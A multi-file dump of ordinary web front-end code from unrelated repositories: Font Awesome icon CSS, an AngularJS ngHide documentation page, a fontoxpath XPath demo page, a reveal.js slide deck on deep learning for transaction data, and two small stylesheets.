.fa-bars:before {
content: "\f0c9";
}
.fa-list-ul:before {
content: "\f0ca";
}
.fa-list-ol:before {
content: "\f0cb";
}
.fa-strikethrough:before {
content: "\f0cc";
}
.fa-underline:before {
content: "\f0cd";
}
.fa-table:before {
content: "\f0ce";
}
.fa-magic:before {
content: "\f0d0";
}
.fa-truck:before {
content: "\f0d1";
}
.fa-pinterest:before {
content: "\f0d2";
}
.fa-pinterest-square:before {
content: "\f0d3";
}
.fa-google-plus-square:before {
content: "\f0d4";
}
.fa-google-plus:before {
content: "\f0d5";
}
.fa-money:before {
content: "\f0d6";
}
.fa-caret-down:before {
content: "\f0d7";
}
.fa-caret-up:before {
content: "\f0d8";
}
.fa-caret-left:before {
content: "\f0d9";
}
.fa-caret-right:before {
content: "\f0da";
}
.fa-columns:before {
content: "\f0db";
}
.fa-unsorted:before,
.fa-sort:before {
content: "\f0dc";
}
.fa-sort-down:before,
.fa-sort-asc:before {
content: "\f0dd";
}
.fa-sort-up:before,
.fa-sort-desc:before {
content: "\f0de";
}
.fa-envelope:before {
content: "\f0e0";
}
.fa-linkedin:before {
content: "\f0e1";
}
.fa-rotate-left:before,
.fa-undo:before {
content: "\f0e2";
}
.fa-legal:before,
.fa-gavel:before {
content: "\f0e3";
}
.fa-dashboard:before,
.fa-tachometer:before {
content: "\f0e4";
}
.fa-comment-o:before {
content: "\f0e5";
}
.fa-comments-o:before {
content: "\f0e6";
}
.fa-flash:before,
.fa-bolt:before {
content: "\f0e7";
}
.fa-sitemap:before {
content: "\f0e8";
}
.fa-umbrella:before {
content: "\f0e9";
}
.fa-paste:before,
.fa-clipboard:before {
content: "\f0ea";
}
.fa-lightbulb-o:before {
content: "\f0eb";
}
.fa-exchange:before {
content: "\f0ec";
}
.fa-cloud-download:before {
content: "\f0ed";
}
.fa-cloud-upload:before {
content: "\f0ee";
}
.fa-user-md:before {
content: "\f0f0";
}
.fa-stethoscope:before {
content: "\f0f1";
}
.fa-suitcase:before {
content: "\f0f2";
}
.fa-bell-o:before {
content: "\f0a2";
}
.fa-coffee:before {
content: "\f0f4";
}
.fa-cutlery:before {
content: "\f0f5";
}
.fa-file-text-o:before {
content: "\f0f6";
}
.fa-building-o:before {
content: "\f0f7";
}
.fa-hospital-o:before {
content: "\f0f8";
}
.fa-ambulance:before {
content: "\f0f9";
}
.fa-medkit:before {
content: "\f0fa";
}
.fa-fighter-jet:before {
content: "\f0fb";
}
.fa-beer:before {
content: "\f0fc";
}
.fa-h-square:before {
content: "\f0fd";
}
.fa-plus-square:before {
content: "\f0fe";
}
.fa-angle-double-left:before {
content: "\f100";
}
.fa-angle-double-right:before {
content: "\f101";
}
.fa-angle-double-up:before {
content: "\f102";
}
.fa-angle-double-down:before {
content: "\f103";
}
.fa-angle-left:before {
content: "\f104";
}
.fa-angle-right:before {
content: "\f105";
}
.fa-angle-up:before {
content: "\f106";
}
.fa-angle-down:before {
content: "\f107";
}
.fa-desktop:before {
content: "\f108";
}
.fa-laptop:before {
content: "\f109";
}
.fa-tablet:before {
content: "\f10a";
}
.fa-mobile-phone:before,
.fa-mobile:before {
content: "\f10b";
}
.fa-circle-o:before {
content: "\f10c";
}
.fa-quote-left:before {
content: "\f10d";
}
.fa-quote-right:before {
content: "\f10e";
}
.fa-spinner:before {
content: "\f110";
}
.fa-circle:before {
content: "\f111";
}
.fa-mail-reply:before,
.fa-reply:before {
content: "\f112";
}
.fa-github-alt:before {
content: "\f113";
}
.fa-folder-o:before {
content: "\f114";
}
.fa-folder-open-o:before {
content: "\f115";
}
.fa-smile-o:before {
content: "\f118";
}
.fa-frown-o:before {
content: "\f119";
}
.fa-meh-o:before {
content: "\f11a";
}
.fa-gamepad:before {
content: "\f11b";
}
.fa-keyboard-o:before {
content: "\f11c";
}
.fa-flag-o:before {
content: "\f11d";
}
.fa-flag-checkered:before {
content: "\f11e";
}
.fa-terminal:before {
content: "\f120";
}
.fa-code:before {
content: "\f121";
}
.fa-reply-all:before {
content: "\f122";
}
.fa-mail-reply-all:before {
content: "\f122";
}
.fa-star-half-empty:before,
.fa-star-half-full:before,
.fa-star-half-o:before {
content: "\f123";
}
.fa-location-arrow:before {
content: "\f124";
}
.fa-crop:before {
content: "\f125";
}
.fa-code-fork:before {
content: "\f126";
}
.fa-unlink:before,
.fa-chain-broken:before {
content: "\f127";
}
.fa-question:before {
content: "\f128";
}
.fa-info:before {
content: "\f129";
}
.fa-exclamation:before {
content: "\f12a";
}
.fa-superscript:before {
content: "\f12b";
}
.fa-subscript:before {
content: "\f12c";
}
.fa-eraser:before {
content: "\f12d";
}
.fa-puzzle-piece:before {
content: "\f12e";
}
.fa-microphone:before {
content: "\f130";
}
.fa-microphone-slash:before {
content: "\f131";
}
.fa-shield:before {
content: "\f132";
}
.fa-calendar-o:before {
content: "\f133";
}
.fa-fire-extinguisher:before {
content: "\f134";
}
.fa-rocket:before {
content: "\f135";
}
.fa-maxcdn:before {
content: "\f136";
}
.fa-chevron-circle-left:before {
content: "\f137";
}
.fa-chevron-circle-right:before {
content: "\f138";
}
.fa-chevron-circle-up:before {
content: "\f139";
}
.fa-chevron-circle-down:before {
content: "\f13a";
}
.fa-html5:before {
content: "\f13b";
}
.fa-css3:before {
content: "\f13c";
}
.fa-anchor:before {
content: "\f13d";
}
.fa-unlock-alt:before {
content: "\f13e";
}
.fa-bullseye:before {
content: "\f140";
}
.fa-ellipsis-h:before {
content: "\f141";
}
.fa-ellipsis-v:before {
content: "\f142";
}
.fa-rss-square:before {
content: "\f143";
}
.fa-play-circle:before {
content: "\f144";
}
.fa-ticket:before {
content: "\f145";
}
.fa-minus-square:before {
content: "\f146";
}
.fa-minus-square-o:before {
content: "\f147";
}
.fa-level-up:before {
content: "\f148";
}
.fa-level-down:before {
content: "\f149";
}
.fa-check-square:before {
content: "\f14a";
}
.fa-pencil-square:before {
content: "\f14b";
}
.fa-external-link-square:before {
content: "\f14c";
}
.fa-share-square:before {
content: "\f14d";
}
.fa-compass:before {
content: "\f14e";
}
.fa-toggle-down:before,
.fa-caret-square-o-down:before {
content: "\f150";
}
.fa-toggle-up:before,
.fa-caret-square-o-up:before {
content: "\f151";
}
.fa-toggle-right:before,
.fa-caret-square-o-right:before {
content: "\f152";
}
.fa-euro:before,
.fa-eur:before {
content: "\f153";
}
.fa-gbp:before {
content: "\f154";
}
.fa-dollar:before,
.fa-usd:before {
content: "\f155";
}
.fa-rupee:before,
.fa-inr:before {
content: "\f156";
}
.fa-cny:before,
.fa-rmb:before,
.fa-yen:before,
.fa-jpy:before {
content: "\f157";
}
.fa-ruble:before,
.fa-rouble:before,
.fa-rub:before {
content: "\f158";
}
.fa-won:before,
.fa-krw:before {
content: "\f159";
}
.fa-bitcoin:before,
.fa-btc:before {
content: "\f15a";
}
.fa-file:before {
content: "\f15b";
}
.fa-file-text:before {
content: "\f15c";
}
.fa-sort-alpha-asc:before {
content: "\f15d";
}
.fa-sort-alpha-desc:before {
content: "\f15e";
}
.fa-sort-amount-asc:before {
content: "\f160";
}
.fa-sort-amount-desc:before {
content: "\f161";
}
.fa-sort-numeric-asc:before {
content: "\f162";
}
.fa-sort-numeric-desc:before {
content: "\f163";
}
.fa-thumbs-up:before {
content: "\f164";
}
.fa-thumbs-down:before {
content: "\f165";
}
.fa-youtube-square:before {
content: "\f166";
}
.fa-youtube:before {
content: "\f167";
}
.fa-xing:before {
content: "\f168";
}
.fa-xing-square:before {
content: "\f169";
}
.fa-youtube-play:before {
content: "\f16a";
}
.fa-dropbox:before {
content: "\f16b";
}
.fa-stack-overflow:before {
content: "\f16c";
}
.fa-instagram:before {
content: "\f16d";
}
.fa-flickr:before {
content: "\f16e";
}
.fa-adn:before {
content: "\f170";
}
.fa-bitbucket:before {
content: "\f171";
}
.fa-bitbucket-square:before {
content: "\f172";
}
.fa-tumblr:before {
content: "\f173";
}
.fa-tumblr-square:before {
content: "\f174";
}
.fa-long-arrow-down:before {
content: "\f175";
}
.fa-long-arrow-up:before {
content: "\f176";
}
.fa-long-arrow-left:before {
content: "\f177";
}
.fa-long-arrow-right:before {
content: "\f178";
}
.fa-apple:before {
content: "\f179";
}
.fa-windows:before {
content: "\f17a";
}
.fa-android:before {
content: "\f17b";
}
.fa-linux:before {
content: "\f17c";
}
.fa-dribbble:before {
content: "\f17d";
}
.fa-skype:before {
content: "\f17e";
}
.fa-foursquare:before {
content: "\f180";
}
.fa-trello:before {
content: "\f181";
}
.fa-female:before {
content: "\f182";
}
.fa-male:before {
content: "\f183";
}
.fa-gittip:before {
content: "\f184";
}
.fa-sun-o:before {
content: "\f185";
}
.fa-moon-o:before {
content: "\f186";
}
.fa-archive:before {
content: "\f187";
}
.fa-bug:before {
content: "\f188";
}
.fa-vk:before {
content: "\f189";
}
.fa-weibo:before {
content: "\f18a";
}
.fa-renren:before {
content: "\f18b";
}
.fa-pagelines:before {
content: "\f18c";
}
.fa-stack-exchange:before {
content: "\f18d";
}
.fa-arrow-circle-o-right:before {
content: "\f18e";
}
.fa-arrow-circle-o-left:before {
content: "\f190";
}
.fa-toggle-left:before,
.fa-caret-square-o-left:before {
content: "\f191";
}
.fa-dot-circle-o:before {
content: "\f192";
}
.fa-wheelchair:before {
content: "\f193";
}
.fa-vimeo-square:before {
content: "\f194";
}
.fa-turkish-lira:before,
.fa-try:before {
content: "\f195";
}
.fa-plus-square-o:before {
content: "\f196";
}
|
build/docs/partials/api/ng/directive/ngHide.html
|
yongshengwang/angular.js
|
<a href='https://github.com/angular/angular.js/edit/master/src/ng/directive/ngShowHide.js?message=docs(ngHide)%3A%20describe%20your%20change...#L181' class='improve-docs btn btn-primary'><i class="glyphicon glyphicon-edit"> </i>Improve this Doc</a>
<a href='https://github.com/angular/angular.js/tree/master/src/ng/directive/ngShowHide.js#L181' class='view-source pull-right btn btn-primary'>
<i class="glyphicon glyphicon-zoom-in"> </i>View Source
</a>
<header class="api-profile-header">
<h1 class="api-profile-header-heading">ngHide</h1>
<ol class="api-profile-header-structure naked-list step-list">
<li>
- directive in module <a href="api/ng">ng</a>
</li>
</ol>
</header>
<div class="api-profile-description">
<p>The <code>ngHide</code> directive shows or hides the given HTML element based on the expression
provided to the <code>ngHide</code> attribute. The element is shown or hidden by removing or adding
the <code>ng-hide</code> CSS class onto the element. The <code>.ng-hide</code> CSS class is predefined
in AngularJS and sets the display style to none (using an !important flag).
For CSP mode please add <code>angular-csp.css</code> to your html file (see <a href="api/ng/directive/ngCsp">ngCsp</a>).</p>
<pre><code class="lang-html"><!-- when $scope.myValue is truthy (element is hidden) -->
<div ng-hide="myValue" class="ng-hide"></div>
<!-- when $scope.myValue is falsy (element is visible) -->
<div ng-hide="myValue"></div>
</code></pre>
<p>When the <code>ngHide</code> expression evaluates to a truthy value then the <code>.ng-hide</code> CSS class is added to the class
attribute on the element causing it to become hidden. When falsy, the <code>.ng-hide</code> CSS class is removed
from the element causing the element not to appear hidden.</p>
<h2 id="why-is-important-used-">Why is !important used?</h2>
<p>You may be wondering why !important is used for the <code>.ng-hide</code> CSS class. This is because the <code>.ng-hide</code> selector
can be easily overridden by heavier selectors. For example, something as simple
as changing the display style on a HTML list item would make hidden elements appear visible.
This also becomes a bigger issue when dealing with CSS frameworks.</p>
<p>By using !important, the show and hide behavior will work as expected despite any clash between CSS selector
specificity (when !important isn't used with any conflicting styles). If a developer chooses to override the
styling to change how to hide an element then it is just a matter of using !important in their own CSS code.</p>
<h3 id="overriding-ng-hide-">Overriding <code>.ng-hide</code></h3>
<p>By default, the <code>.ng-hide</code> class will style the element with <code>display: none!important</code>. If you wish to change
the hide behavior with ngShow/ngHide then this can be achieved by restating the styles for the <code>.ng-hide</code>
class in CSS:</p>
<pre><code class="lang-css">.ng-hide {
/* this is just another form of hiding an element */
display: block!important;
position: absolute;
top: -9999px;
left: -9999px;
}
</code></pre>
<p>By default you don't need to override in CSS anything and the animations will work around the display style.</p>
<h2 id="a-note-about-animations-with-nghide-">A note about animations with <code>ngHide</code></h2>
<p>Animations in ngShow/ngHide work with the show and hide events that are triggered when the directive expression
is true and false. This system works like the animation system present with ngClass, except that the <code>.ng-hide</code>
CSS class is added and removed for you instead of your own CSS class.</p>
<pre><code class="lang-css">//
//a working example can be found at the bottom of this page
//
.my-element.ng-hide-add, .my-element.ng-hide-remove {
transition: 0.5s linear all;
}
.my-element.ng-hide-add { ... }
.my-element.ng-hide-add.ng-hide-add-active { ... }
.my-element.ng-hide-remove { ... }
.my-element.ng-hide-remove.ng-hide-remove-active { ... }
</code></pre>
<p>Keep in mind that, as of AngularJS version 1.3.0-beta.11, there is no need to change the display
property to block during animation states--ngAnimate will handle the style toggling automatically for you.</p>
</div>
<div>
<h2>Directive Info</h2>
<ul>
<li>This directive executes at priority level 0.</li>
<li>This directive can be used as <a href="api/ng/service/$compile#-multielement-">multiElement</a></li>
</ul>
<h2 id="usage">Usage</h2>
<div class="usage">
<ul>
<li>as attribute:
<pre><code><ANY ng-hide="expression"> ... </ANY></code></pre>
</li>
</div>
<h2 id="animations">Animations</h2>
<p>removeClass: <code>.ng-hide</code> - happens after the <code>ngHide</code> expression evaluates to a truthy value and just before the contents are set to hidden
addClass: <code>.ng-hide</code> - happens after the <code>ngHide</code> expression evaluates to a non truthy value and just before the contents are set to visible</p>
<a href="api/ngAnimate/service/$animate">Click here</a> to learn more about the steps involved in the animation.
<section class="api-section">
<h3>Arguments</h3>
<table class="variables-matrix input-arguments">
<thead>
<tr>
<th>Param</th>
<th>Type</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>
ngHide
</td>
<td>
<a href="" class="label type-hint type-hint-expression">expression</a>
</td>
<td>
<p>If the <a href="guide/expression">expression</a> is truthy then
the element is shown or hidden respectively.</p>
</td>
</tr>
</tbody>
</table>
</section>
<h2 id="example">Example</h2><p>
<div>
<a ng-click="openPlunkr('examples/example-example92', $event)" class="btn pull-right">
<i class="glyphicon glyphicon-edit"> </i>
Edit in Plunker</a>
<div class="runnable-example"
path="examples/example-example92"
module="ngAnimate"
deps="angular-animate.js"
animations="true">
<div class="runnable-example-file"
name="index.html"
language="html"
type="html">
<pre><code>Click me: <input type="checkbox" ng-model="checked" aria-label="Toggle ngShow"><br/> <div> Show: <div class="check-element animate-hide" ng-show="checked"> <span class="glyphicon glyphicon-thumbs-up"></span> I show up when your checkbox is checked. </div> </div> <div> Hide: <div class="check-element animate-hide" ng-hide="checked"> <span class="glyphicon glyphicon-thumbs-down"></span> I hide when your checkbox is checked. </div> </div></code></pre>
</div>
<div class="runnable-example-file"
name="glyphicons.css"
language="css"
type="css">
<pre><code>@import url(../../components/bootstrap-3.1.1/css/bootstrap.css);</code></pre>
</div>
<div class="runnable-example-file"
name="animations.css"
language="css"
type="css">
<pre><code>.animate-hide { -webkit-transition: all linear 0.5s; transition: all linear 0.5s; line-height: 20px; opacity: 1; padding: 10px; border: 1px solid black; background: white; } .animate-hide.ng-hide { line-height: 0; opacity: 0; padding: 0 10px; } .check-element { padding: 10px; border: 1px solid black; background: white; }</code></pre>
</div>
<div class="runnable-example-file"
name="protractor.js"
type="protractor"
language="js">
<pre><code>var thumbsUp = element(by.css('span.glyphicon-thumbs-up')); var thumbsDown = element(by.css('span.glyphicon-thumbs-down')); it('should check ng-show / ng-hide', function() { expect(thumbsUp.isDisplayed()).toBeFalsy(); expect(thumbsDown.isDisplayed()).toBeTruthy(); element(by.model('checked')).click(); expect(thumbsUp.isDisplayed()).toBeTruthy(); expect(thumbsDown.isDisplayed()).toBeFalsy(); });</code></pre>
</div>
<iframe class="runnable-example-frame" src="examples/example-example92/index.html" name="example-example92"></iframe>
</div>
</div>
</p>
</div>
|
demo/index.html
|
FontoXML/fontoxpath
|
<html>
<head>
<title>fontoxpath</title>
<meta charset="utf-8" />
<link
rel="stylesheet"
href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/styles/default.min.css"
/>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.13.1/highlight.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/js-beautify/1.14.0/beautify.js"></script>
<script src="./built/demo/main.js" type="module"></script>
<style>
#xmlFile * {
all: initial;
display: block;
margin: 5px;
border: 1px solid black;
min-height: 5px;
}
#xpathField {
width: 100%;
}
</style>
</head>
<body>
<div>
<h4>Edit the XML here</h4>
<sub>Note: Highlighting will only update on page reload.</sub>
<pre id="xmlSource" contenteditable="true"></pre>
<h4>Edit the XPath here:</h4>
<label><input id="allowXQuery" type="checkbox" />XQuery</label>
<label
><input id="allowXQueryUpdateFacility" type="checkbox" />XQuery Update
Facility</label
>
<label><input id="useJsCodegenBackend" type="checkbox" />Use JS codegen backend</label>
<br />
<label>
Codegen return type
<select id="codegenReturnTypeChoice">
<option value="FIRST_NODE">First Node</option>
<option value="NODES">Nodes</option>
<option value="STRING">String</option>
<option value="BOOLEAN">Boolean</option>
</select>
</label>
<br />
<pre
type="text"
contenteditable="true"
id="xpathField"
value="//*"
style="min-height: 100px"
></pre>
<h4>The bucket for this selector</h4>
<pre id="bucketField"></pre>
</div>
<hr />
<div>
<pre id="log"></pre>
<h4>Result, as text</h4>
<pre id="resultText"></pre>
<h4>Updated document</h4>
<pre id="updateResult"></pre>
<h4>AST, as JsonML</h4>
<pre id="astJsonMl"></pre>
<h4>AST, as XML</h4>
<pre id="astXml"></pre>
<h4>Trace Output</h4>
<pre id="traceOutput"></pre>
<h4>JS Codegen Output</h4>
<pre id="jsCodegenOutput"></pre>
</div>
</body>
</html>
|
index.html
|
AndreasKostler/presi10042015
|
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Exploring Deep Learning Methods</title>
<meta name="description" content="Initial presentation
of literature review">
<meta name="author" content="Andreas Koestler">
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui">
<link rel="stylesheet" href="css/reveal.css">
<link rel="stylesheet" href="css/theme/black.css" id="theme">
<!-- Code syntax highlighting -->
<link rel="stylesheet" href="lib/css/zenburn.css">
<!-- Printing and PDF exports -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
<!--[if lt IE 9]>
<script src="lib/js/html5shiv.js"></script>
<![endif]-->
</head>
<body>
<div class="reveal">
<!-- Any section element inside of this container is displayed as a slide -->
<div class="slides">
<section>
<h1>Exploring Deep Learning Methods</h1>
<h3>for Discovering Features in Transaction Events</h3>
<p>
<small>Andreas Koestler </small>
</p>
</section>
<!-- Example of nested vertical slides -->
<section>
<h2>Introduction</h2>
<p>
<ul>
<b>Deep learning has revolutionalised</b>
<li>
Speech recognition
</li>
<li>
Object recognition
</li>
<b>Starting to impact</b>
<li>
NLP
</li>
<li>
Computer based translation
</li>
<li>
Reinforcemant learning, etc...
</li>
</ul>
</p>
</section>
<section>
<h2>Motivation #1</h2>
<p>
<ul>
<b> Learning (distributed)
representations </b>
<li>
Handcrafting features is
often difficult (Sift,
edge-detectore, etc)
</li>
<li>
Task/domain/context specific
</li>
<li>
Humans develop representations
for learning and reasoning
</li>
<li>
Deep learning provides ways of
doing this!
</li>
</ul>
</p>
</section>
<section>
<h2>Motivation #2</h2>
<p>
<ul>
<b> The need for distributed
representations </b>
<li>
Combat curse of dimensionality
</li>
<li>
Represent many dimensions of
similarity
</li>
</ul>
</p>
</section>
<section>
<h2>Local representations</h2>
<p>
(Sparse) One-shot encoding
<ul>
<li>
$hotel=(0,0,0,0,0,0,0,0,1,0,0,0,0,0,0)$
$motel=(0,1,0,0,0,0,0,0,0,0,0,0,0,0,0)$
</li>
<li>
Generalizing locally requires examples for all
relevant variations
</li>
</ul>
</p>
</section>
<section>
<h2>Distributed representations</h2>
<p>
<ul>
<li>
$hotel=(1,0,1,1,1,0)$
</li>
<li>
Concept central to
connectionism
</li>
<li>
<q>
"In a
connectionist network, a
distributed representation
occurs when some concept or
meaning is represented by the
network, but that meaning is
represented by a pattern of
activity across a number of
processing units." (Hinton et al,
1986)
</q>
</li>
<li>
Learning distributed features
can be exponentially more
efficient than
nearest-neighbor-like or
clustering-like models (curse
of dimensionality)
</li>
</ul>
</p>
</section>
<section>
<h2>Motivation #3</h2>
<p>
<ul>
<b> Today, most practical ML
methods are supervised learning</b>
<li>
But almost all data is unlabeled
</li>
<b> Most information must be
acquired unsupervised</b>
<li>
Fortunately, unsupervised learning
a good model of observed data
boost classification performance
</li>
</ul>
</p>
</section>
<section>
<h2>Motivation #4</h2>
<p>
<ul>
<b>Learning multiple levels of
representation/abstraction</b>
<li>
Intermediate representations
that can be shared across tasks
</li>
<li>
Multiple levels of latent variables
allow combinatorial sharing
</li>
</ul>
</p>
</section>
<section>
<h2>Motivation #5</h2>
<p>
<ul>
<b>Why now?</b>
<li>
New methods for unsupervised
pre-training have been
developed (RBMs,
autoencoders, etc.)
</li>
<li>
More efficient parameter estimation methods
</li>
<li>
Better understanding of model
regularization (e.g. dropout)
</li>
</ul>
</p>
</section>
<section>
<h2>Definitions #1</h2>
<ul>
<li>
Finite set of Nodes $N = {\{u_1,u_2,...\}}$
and connections $H \subseteq
{N \times N}$
</li>
<li>
FNN acyclic, RNN cyclic
</li>
<li>
In FNN, $k-th$ layer $(k \gt
1)$ set of nodes $u \in N$
such that $\exists Path$ of
length $l \leq (k - 1)$
</li>
<li>
NN’s behavior is determined by
set of real-valued,
modifiable, parameters $w_i (i
= 1, ... , n)$
</li>
<li>
The NN’s behavior fully specified by a
set of parameters $w_i (i = 1, ... ,
n), w_i \in \mathbb{R}$ and real-valued
activation function $f$,
typically $\tanh$ or the
logistic function.
</li>
</ul>
</section>
<section>
<h2>Definitions #2</h2>
<p>
<ul>
<li>
<q>
“A field within machine
learning that is based on
algorithms for learning
multiple levels of
representation in order to
model complex relationships
among data. Higher-level
features and concepts are
thus defined in terms of
lower-level ones, and such a
hierarchy of features is
called a deep architec-
ture.”
</q>
</li>
<li>
<q>
“Deep Learning is a new area
of Machine Learning research,
which has been introduced with
the objective of moving
Machine Learning closer to one
of its original goals:
Artificial Intelligence."
</q>
</li>
<li>
<q>
"Machine learning
algorithms inspired by brains,
based on learning multiple
layers or
representation/abstraction."
</q>
</li>
</ul>
</p>
</section>
<section>
<h2>Types of Deep Architectures</h2>
<p>
<ul>
<li>
Autoencoders (denoising, sparse,
contracting, variational) (Bengio)
</li>
<li>
RBMs (Smolensky, 1986; Hinton)
</li>
<li>
DBNs (Hinton)
</li>
<li>
... many more
</li>
</ul>
</p>
</section>
<section>
<h2>Data</h2>
<p>
<table>
<tbody>
<tr>
<td>event_id</td>
<td>dr_account_number</td>
<td>account_access_card</td>
</tr>
<tr>
<td>event_start_time</td>
<td>cr_account_number</td>
<td>transaction_amount</td>
</tr>
<tr>
<td>event_end_time</td>
<td>dr_refn_trcd</td>
<td>event_subtype</td>
</tr>
<tr>
<td>trans_time</td>
<td>cr_refn_trcd</td>
<td>description</td>
</tr>
<tr>
<td>event_class</td>
<td>terminal_id </td>
<td>event_source_id</td>
</tr>
<tr>
<td>event_type</td>
<td>terminal_location</td>
<td>entity_roles</td>
</tr>
<tr>
<td>sa1</td>
<td>latitude</td>
<td>longitude</td>
</tr>
</tbody>
</table>
</p>
</section>
<section>
<h2>Data</h2>
<p>
<ul>
<li>CC events, EFTPOS, BPAY,
Trasnfers, ATM
</li>
<li>Captures 40% of all
transactions in Australia
</li>
</ul>
</p>
</section>
<section>
<h2>Directions</h2>
<p>
<ul>
<b>The expectation is that</b>
<li>
high-level concepts/representations arise from the
internal representations in
the networks (e.g., customer price elasticity,
interests, need, etc.)
</li>
<li>
high-level
concepts/represenations can be
shared across tasks
(e.g. fraud detection,
purchase prediction, etc.)
</li>
</ul>
</p>
</section>
<section>
<h2>Directions</h2>
<p>
<ul>
<b>High-level tasks</b>
<li>
Tooling
</li>
<li>
Baseline model
</li>
<li>
Incremental improvement using DL
</li>
<b>Focus on</b>
<li>
Unsupervised (representation)
learning
</li>
<li>
Representation transfer
</li>
<li>
Efficient learning in highly
distributed (cluster) environment
</li>
</ul>
</p>
</section>
<section>
<h2>Outlook</h2>
<p>
<ul>
<b>Next steps</b>
<li>
Finish literature review
</li>
<li>
Write research proposal
</li>
<li>
Literature db, progress,
etc: <a href="http://github.com/AndreasKostler/sisyphus">Sisyphus</a>
</li>
</ul>
</p>
</section>
</div>
</div>
<script src="lib/js/head.min.js"></script>
<script src="js/reveal.js"></script>
<script>
// Full list of configuration options available at:
// https://github.com/hakimel/reveal.js#configuration
Reveal.initialize({
controls: true,
progress: true,
history: true,
center: true,
math: {
mathjax: 'http://cdn.mathjax.org/mathjax/latest/MathJax.js',
config: 'TeX-AMS_HTML-full' // See http://docs.mathjax.org/en/latest/config-files.html
},
transition: 'slide', // none/fade/slide/convex/concave/zoom
// Optional reveal.js plugins
dependencies: [
{ src: 'lib/js/classList.js', condition: function() { return !document.body.classList; } },
{ src: 'plugin/math/math.js', async: true },
{ src: 'plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
{ src: 'plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
{ src: 'plugin/highlight/highlight.js', async: true, condition: function() { return !!document.querySelector( 'pre code' ); }, callback: function() { hljs.initHighlightingOnLoad(); } },
{ src: 'plugin/zoom-js/zoom.js', async: true },
{ src: 'plugin/notes/notes.js', async: true }
]
});
</script>
</body>
</html>
|
code/server/static/qsearch.css
|
lavizhao/insummer
|
body {
padding-top: 20px;
width:70%;
margin:0px auto
}
.footer {
padding-top: 40px;
padding-bottom: 40px;
margin-top: 40px;
border-top: 1px solid #eee;
}
/* Main marketing message and sign up button */
.jumbotron {
text-align: center;
background-color: transparent;
}
.search-field {
width:400px;
height:40px;
}
.first-page{
position:absolute;
text-align:center;
margin-left:auto;
margin-right:auto;
top:200px;
left:550px;
}
p {
font-size:20px;
}
/* Customize the exform links to be fill the entire space of the .navbar */
.exform {
background-color: #eee;
border: 1px solid #ccc;
border-radius: 5px;
}
.exform > li > a {
padding-top: 15px;
padding-bottom: 15px;
margin-bottom: 0;
font-weight: bold;
color: #777;
text-align: center;
background-color: #e5e5e5; /* Old browsers */
background-image: -webkit-gradient(linear, left top, left bottom, from(#f5f5f5), to(#e5e5e5));
background-image: -webkit-linear-gradient(top, #f5f5f5 0%, #e5e5e5 100%);
background-image: -o-linear-gradient(top, #f5f5f5 0%, #e5e5e5 100%);
background-image: -webkit-gradient(linear, left top, left bottom, from(top), color-stop(0%, #f5f5f5), to(#e5e5e5));
background-image: linear-gradient(top, #f5f5f5 0%, #e5e5e5 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f5f5f5', endColorstr='#e5e5e5',GradientType=0 ); /* IE6-9 */
background-repeat: repeat-x; /* Repeat the gradient */
border-bottom: 1px solid #d5d5d5;
}
.exform > .active > a,
.exform > .active > a:hover,
.exform > .active > a:focus {
background-color: #ddd;
background-image: none;
-webkit-box-shadow: inset 0 3px 7px rgba(0,0,0,.15);
box-shadow: inset 0 3px 7px rgba(0,0,0,.15);
}
.exform > li:first-child > a {
border-radius: 5px 5px 0 0;
}
.exform > li:last-child > a {
border-bottom: 0;
border-radius: 0 0 5px 5px;
}
@media (min-width: 500px) {
.exform {
max-height: 52px;
}
.exform > li > a {
border-right: 1px solid #d5d5d5;
border-left: 1px solid #fff;
}
.exform > li:first-child > a {
border-left: 0;
border-radius: 5px 0 0 5px;
}
.exform > li:last-child > a {
border-right: 0;
border-radius: 0 5px 5px 0;
}
}
/* Responsive: Portrait tablets and up */
@media screen and (min-width: 768px) {
/* Remove the padding we set earlier */
.masthead,
.marketing,
.footer {
padding-right: 0;
padding-left: 0;
}
}
|
formio.css
|
pospi/formio
|
/**
* Based on CLEAN FORM css
* http://www.mattvarone.com/web-design/clean-accesible-form-foundation/
*
* Various edits, changes etc made. For a full list of what was changed
* (and why), see http://github.com/pospi/formio/commits/master/formio.css
*
*/
/* General */
.formio, form.formio {
line-height: 1.25em;
text-align:left;
position:relative;
background: transparent;
border: 0;
}
.formio div.row, .formio fieldset, .formio div.group div.row {
clear: left;
padding: 0.5em;
margin: 0;
}
.formio label {
padding: 0;
margin: 0 2% 0 0;
}
.formio div.blck { position: relative; }
.formio div.blck .row { background: transparent; }
.formio div.blck .row label { display: none; }
.formio div.group .row label { display: inline; }
.formio div.blck input[type=checkbox], .formio div.blck input[type=radio], .formio div.blck input[type=submit], .formio div.blck input[type=reset], .formio div.blck input[type=button] { width: auto; }
.formio div.blck .pad { height: 1em; }
.formio fieldset legend {
font-size: 1.2em;
padding: 0; /* IE only (see overrides at bottom) */
}
.formio label, .formio .multiple legend {
position: relative;
font-size: 1em;
}
.formio input, .formio div.readonly {
line-height: 1em;
}
.formio div.readonly { padding-top: 0.25em; }
.formio input, .formio textarea, .formio select {
font-size:1em;
}
.formio textarea {
height: 8em; /* default textarea height */
vertical-align: top;
}
.formio .multiple {
border: 0;
}
.formio .multiple input {
width:auto;
border:none;
cursor:pointer;
}
.formio .multiple label {
float:left;
font-weight: normal;
margin: 0;
}
.formio .multiple.col1 label { clear:both; }
.formio .multiple.col2 label { width:50%; }
.formio .multiple.col3 label { width:33%; }
.formio .multiple.col4 label { width:25%; }
.formio .multiple.col5 label { width:20%; }
.formio .multiple legend .required { /* shift required asterisk up in fieldset element legends */
top: 0.25em;
}
.formio .multiple p.hint, .formio .multiple p.err { padding: 1em 0 0 0; margin-left: 0; }
